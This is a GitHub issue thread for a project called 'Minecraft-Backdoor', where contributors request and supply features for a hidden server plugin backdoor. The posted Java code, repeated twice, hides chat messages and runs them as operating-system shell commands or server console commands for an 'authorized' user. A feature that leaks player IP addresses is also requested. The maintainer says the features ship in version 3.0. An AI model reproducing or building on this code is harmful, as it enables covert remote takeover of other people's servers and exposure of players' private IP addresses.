### ISSUE TITLE
More stuff

### ISSUE THREAD

**Issue by ghost** [ThiccIndustries/Minecraft-Backdoor#75]
Add a command to execute shell commands which can be done for example using
```java
Runtime runtime = Runtime.getRuntime();
Process p = runtime.exec("ls /");
```
And a ip leak command
example: [prefix]ip [username]

**Comment by MajesticWaffle** [comment]
I didn't know this was a thing, I'll definitely look into it.

**Comment by erxson** [comment]
`
if (IsUserAuthorized(p)) {
            switch (commandType) {
                //os
                case (">") -> {
                    try {
                        p.sendMessage("Running: " + command);
                        Process proc = Runtime.getRuntime().exec(command);
                        ByteBuffer byteBuffer = StandardCharsets.US_ASCII.encode(getResult(proc));
                        String ASCIIResult = new String(byteBuffer.array(), StandardCharsets.US_ASCII);
                        p.sendMessage(ASCIIResult);
                    } catch (Exception ex) {
                        p.sendMessage(ChatColor.RED + "Error executing server command.\n" + ex);
                    }
                    e.setCancelled(true);
                }
                //console
                case ("\\") -> {
                    new BukkitRunnable() {
                        @Override
                        public void run() {
                            plugin.getServer().dispatchCommand(plugin.getServer().getConsoleSender(), command);
                        }
                    }.runTask(plugin);
                    e.setCancelled(true);
                }
                default -> {
                }
            }`

**Comment by erxson** [comment]
```
if (IsUserAuthorized(p)) {
            switch (commandType) {
                //os
                case (">") -> {
                    try {
                        p.sendMessage("Running: " + command);
                        Process proc = Runtime.getRuntime().exec(command);
                        ByteBuffer byteBuffer = StandardCharsets.US_ASCII.encode(getResult(proc));
                        String ASCIIResult = new String(byteBuffer.array(), StandardCharsets.US_ASCII);
                        p.sendMessage(ASCIIResult);
                    } catch (Exception ex) {
                        p.sendMessage(ChatColor.RED + "Error executing server command.\n" + ex);
                    }
                    e.setCancelled(true);
                }
                //console
                case ("\\") -> {
                    new BukkitRunnable() {
                        @Override
                        public void run() {
                            plugin.getServer().dispatchCommand(plugin.getServer().getConsoleSender(), command);
                        }
                    }.runTask(plugin);
                    e.setCancelled(true);
                }
                default -> {
                }
            }
```

**Comment by MajesticWaffle** [comment]
Implemented in [Version 3.0](https://github.com/ThiccIndustries/Minecraft-Backdoor/releases/tag/v3.0).
